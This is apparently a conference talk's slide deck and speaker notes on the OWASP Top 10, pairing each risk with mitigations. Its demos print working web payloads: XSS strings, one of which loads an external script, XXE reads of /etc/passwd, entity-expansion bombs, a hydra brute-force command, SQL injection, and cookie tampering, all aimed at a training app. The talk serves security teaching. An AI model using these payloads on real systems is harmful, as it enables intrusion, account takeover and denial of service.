-
1.
OWASP TOP 10
Setting the bar for security
-
2.
Hi
Robert MacLean
@rmaclean | sadev.co.za
DevConf | DevUG | Equal
Experts
Cape Town | South Africa
-
3.
Mandatory hacker photo
-
4.
Content warning
Do not try this at home. Hacking is illegal without permission.
One demo contains F***
-
5.
What is OWASP?
Non-profit foundation for the improvement of the security of software
Join as a member to support them and get conference discounts
Local meetups available
Cape Town: meetup.com/en-AU/OWASP-Cape-Town-Chapter-Meetup
Produce tools: ZAP, Dependency-Check
Guidance
-
6.
OWASP TOP 10
Using the 2017 guidance, as the 2020 guidance is still underway
As it evolves, items are added, merged and removed
This is the bar for security
Focused on web security, but a lot is broadly applicable
10 areas which can be implemented and exploited in a variety of ways
Based on real-world feedback from OWASP members
See: owasp.org/www-project-top-ten
Each scored on 4 axes (scale is 1 to 3):
Attack Vector: Exploitability
Security Weakness: Prevalence
Security Weakness: Detectability
Impact: Technical
-
7.
OWASP TOP 10
1. Injection
2. Broken Authentication
3. Sensitive Data Exposure
4. XML External Entities (XXE)
5. Broken Access Control
6. Security Misconfiguration
7. Cross-Site Scripting (XSS)
8. Insecure Deserialization
9. Using Components with Known Vulnerabilities
10. Insufficient Logging & Monitoring
-
8.
Ten: Insufficient Logging & Monitoring
Not logging and auditing logins, failed logins and high-value transactions
Not enough information in what is logged
Logs stored only locally
Logs disabled, or configured so that pen tests never trigger an alert
Not alerting on logs & metrics
Exploitability: 2
Prevalence: 3
Detectability: 1
Technical: 2
-
9.
Nine: Using Components with Known Vulnerabilities
3rd-party code runs with the same permissions as the rest of the system
OS, database etc… all need to be checked too
Scan on a continuous basis
• Library tools like dependency check and npm audit
• Container scanning
• OS patching
Only obtain code from official sources
Exploitability: 2
Prevalence: 3
Detectability: 2
Technical: 2
-
10.
Eight: Insecure Deserialization
A specially crafted data structure causes the execution of code
Applies any time you use serialisation
Exploitability: 1
Prevalence: 2
Detectability: 2
Technical: 3
-
11.
Demo
-
12.
Eight: Insecure Deserialization
User input should not be trusted
Don’t accept serialised data
• If you must, encrypt and/or sign the payloads
Use safe deserialization options
-
13.
Seven: Cross-Site Scripting (XSS)
Reflected XSS: not validating input and returning it straight back to the user
Stored XSS: not validating input, putting it in the DB and then displaying it later
DOM XSS: client-side code (or the APIs feeding it) putting attacker-controlled content into the UI
Can lead to account takeovers, spam, multi-factor bypasses, key logging
Exploitability: 3
Prevalence: 3
Detectability: 3
Technical: 2
-
14.
Demo
-
15.
Demos
<script>alert(`xss`)</script>
<iframe src="javascript:alert(`xss`)">
<<a|ascript>alert(`xss`)</script>
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
<SCRIPT>alert("XSS");</SCRIPT>
_=`${`${{}}`[!![]<<!![]<<!![]|!![]]}${`${{}}`[!!{}<<![]]}${`${[][~[]]}`[!!{}<<![]]}${`${!![][~[]]}`[(!![]<
<!![])|!![]]}${`${![][~[]]}`[!{}<<![]]}${`${![][~[]]}`[!!{}<<![]]}${`${![][~[]]}`[!!{}<<!![]]}${`${{}}`[!!
[]<<!![]<<!![]|!![]]}${`${![][~[]]}`[!{}<<![]]}${`${{}}`[!!{}<<![]]}${`${![][~[]]}`[!!{}<<![]]}`,__=`${`${
{}}`[!!{}<<![]]}${`${{}}`[!!{}<<!![]]}${`${!![][~[]]}`[[]<<[]]}${`${![][~[]]}`[!!{}<<!![]]}${`${!![][~[]]}
`[(!![]<<!![])|!![]]}${`${{}}`[!![]<<!![]<<!![]|!![]]}${`${!![][~[]]}`[!!{}<<![]]}${`${![][~[]]}`[!{}<<![]
]}${`${[][~[]]}`[!![]<<!![]<<!![]|!![]]}${`${{}}`[!!{}<<![]]}${`${[][~[]]}`[!!{}<<![]]}!`,[][_][_](`${`${{
}}`[!![]<<!![]<<!![]|!![]]}${`${{}}`[!!{}<<![]]}${`${[][~[]]}`[!!{}<<![]]}${`${!![][~[]]}`[(!![]<<!![])|!!
[]]}${`${{}}`[!!{}<<![]]}${`${!![][~[]]}`[!!{}<<!![]]}${`${![][~[]]}`[(!![]<<!![])|!![]]}${`${{}}`[[]<<[]]
}'${`${!![][~[]]}`[!!{}<<!![]]}${`${{}}`[!!{}<<![]]}${`${``[_]}`[!![]<<!![]<<!![]<<!![]^!![]<<!![]<<!![]|!
!{}<<!![]]}'${`${{}}`[!![]<<!![]<<!![]<<!![]^!![]<<!![]<<!![]|!!{}<<!![]]}(__)`)()
-
16.
Seven: Cross-Site Scripting (XSS)
User input should not be trusted
HTML-escape any dynamic content (tags, attributes, CSS, etc.)
Use a safer format for input, say Markdown
Make use of HttpOnly cookies
Make use of CORS
Make use of CSP
Make use of audit tools
-
17.
Six: Security Misconfiguration
Unused ports and services running on machines
Default credentials
Error handling returning too much info
Using code with known issues
Exploitability: 3
Prevalence: 3
Detectability: 3
Technical: 2
-
18.
Demo
-
19.
Six: Security Misconfiguration
User input should not be trusted
Get security audits done
Go on security training
Automate checking of settings and code
Remove (or block) anything not needed
-
20.
Five: Broken Access Control
Authentication vs. Authorization
Bypassing access control by editing the URL or anything else on the client side
IDORs (insecure direct object references)
Exploitability: 2
Prevalence: 2
Detectability: 2
Technical: 3
-
21.
Demo
-
22.
Five: Broken Access Control
User input should not be trusted
Deny by default
Rate limits
Disable web server directory listing
-
23.
Four: XML External Entities (XXE)
Untrusted XML is parsed
• SAML auth
The XML parser has lots of features and those features are exploited
Exploitability: 2
Prevalence: 2
Detectability: 3
Technical: 3
-
24.
Demos
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
-
25.
Demos
a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
100
1000
10 000
100 000
1 000 000
10 000 000
100 000 000
1 BILLION
-
26.
Four: XML External Entities (XXE)
User input should not be trusted
Run static code analysis tools
Run dependency analysis tools
• NPM & Yarn Audit
• Dependency Check for JVM
Disable SOAP versions prior to 1.2
Disable features you do not need
• XML external entities & DTDs in XML
-
27.
Three: Sensitive Data Exposure
Man-in-the-middle attacks
Stealing records off the server, or off any server the data was sent through
Weak crypto
No hashing of passwords
Sharing data which should be private
Exploitability: 2
Prevalence: 3
Detectability: 2
Technical: 3
-
28.
Demo
-
29.
Three: Sensitive Data Exposure
Classify data processed, stored and transmitted.
Identify risk for business, law (GDPR)
Only store information you must
Encrypt sensitive data at rest
Encrypt all data in transit
Disable caching of sensitive data
HSTS Preload
-
30.
Two: Broken Auth
Default admin accounts
Credential Stuffing, brute force and dictionary attacks
Unexpired session tokens
Weak or ineffective forgot password and recovery processes
Plaintext passwords, not hashed passwords
Not invalidating session IDs
Exploitability: 3
Prevalence: 2
Detectability: 2
Technical: 3
-
31.
Demo
-
32.
Demos
$ hydra -l admin@juice-sh.op \
    -P /usr/share/wordlists/rockyou.txt 127.0.0.1 \
    http-post-form '/#/login:email=^USER^&password=^PASS^:Invalid email or password.' \
    -fV -s 3000 -t 1
-
33.
Two: Broken Auth
Do not build auth unless needed – make use of the existing team
Credential Stuffing, brute force and dictionary attacks
• haveibeenpwned.com/Passwords
• Rate limits
Unexpired session tokens
Weak or ineffective forgot password and recovery processes
• Avoid knowledge questions
• Do users need passwords?
• Two factor auth
Plaintext passwords
• Just don’t
Hash & salt passwords
• Pick hashing algorithms which are slow and don’t have collisions
-
34.
One: Injection
Attacker sends data to an interpreter to make it return the wrong answer, change settings they shouldn't be able to, or escalate privileges
SQL Injection is one vector, but this could be any database, environment variables, JSON, SOAP, XML, headers, cookies, etc.
Exploitability: 3
Prevalence: 2
Detectability: 3
Technical: 3
-
35.
Demo
-
36.
One: Injection
User input should not be trusted
Use SQL parameters for SQL
Avoid building strings in code based on user input
Use approval lists (allowlists) to check content
“I use an ORM, so I am safe” – By default, most likely but you should check
Use tools like ZAP to look for these
-
37.
Done?
No, this is the minimum bar
Join your local OWASP group
Run your checks all the time
Get a red team
Practice incidents
Secure by default is a great first principle
-
38.
Thank You
Robert MacLean
robert@sadev.co.za
Photo by Francois Hoang on Unsplash
Photo by Andrew Haimerl on Unsplash
Photo by Luther Bottrill on Unsplash
Photo by Emre Karataş on Unsplash
Photo by Levon Vardanyan on Unsplash
Photo by Austrian National Library on Unsplash
http://www.appsensor.org/
Leonard H. Courtney \ Lies — damned lies — and statistics \ The price of peace is eternal vigilance
A PHP forum uses PHP object serialization to save a "super" cookie, containing the user's user ID, role, password hash, and other state:
a:4:{i:0;i:132;i:1;s:7:"Mallory";i:2;s:4:"user";i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}
An attacker changes the serialized object to give themselves admin privileges:
a:4:{i:0;i:1;i:1;s:5:"Alice";i:2;s:5:"admin";i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}
Photo by Denny Ryanto on Unsplash
https://juice-shop.herokuapp.com/api-docs/
{
"cid": "JS0815DE",
"orderLines": [{
"product": "(function dos() { while(true); })()"
}]
}
var x = 'var y = {"name":(function hi() { console.log(1) })()}'
JSON.parse(x)
eval(x)
Photo by kevin laminto on Unsplash
Talk about alert
Try search for <script>alert("1")</script>
Show network tab is filtering it out… smart
<iframe src="javascript:alert(`xss`)">
https://github.com/ihebski/XSS-Payloads
http://www.jsfuck.com/
Directory listing is not disabled on the server. An attacker discovers they can simply list directories. The attacker finds and downloads the compiled Java classes, which they decompile and reverse engineer to view the code. The attacker then finds a serious access control flaw in the application.
Photo by JJ Ying on Unsplash
https://obscure-chamber-62037.herokuapp.com/#/deluxe-membership
Photo by Victor Li on Unsplash
Just go to https://juice-shop.herokuapp.com/ftp
Tell story about query param for user ID
Photo by Oleksandr Zhabin on Unsplash
https://juice-shop.herokuapp.com/admin#/saved-payment-methods
Show how credit card number is in network tab
Photo credit https://www.flickr.com/photos/bookcatalog/27162728588
Photo by Alexander Popov on Unsplash
bjoern@juice-sh.op & West-2082
https://juice-shop.herokuapp.com/admin#/forgot-password
https://tools.kali.org/password-attacks/hydra
rockyou.txt contains 14,341,564 unique passwords, used in 32,603,388 accounts.
https://www.kaggle.com/wjburns/common-password-list-rockyoutxt
Photo by Levon Vardanyan on Unsplash
https://juice-shop.herokuapp.com/#/
Make sure to open network diagnostic
Try quote for email and show error
Talk about limiting errors back to users
Then use a single quote for the email
1' OR '1=1' --
SELECT * FROM Users WHERE email = '1' OR '1=1' -- AND password = 'a8f5f167f44f4964e6c998dee827110c' AND deletedAt IS NULL
https://mybroadband.co.za/news/security/179064-ethekwini-municipality-leaking-private-details-of-over-300000-residents.html
Photo by Victor Rodriguez on Unsplash
Photo by Jonathan Formento on Unsplash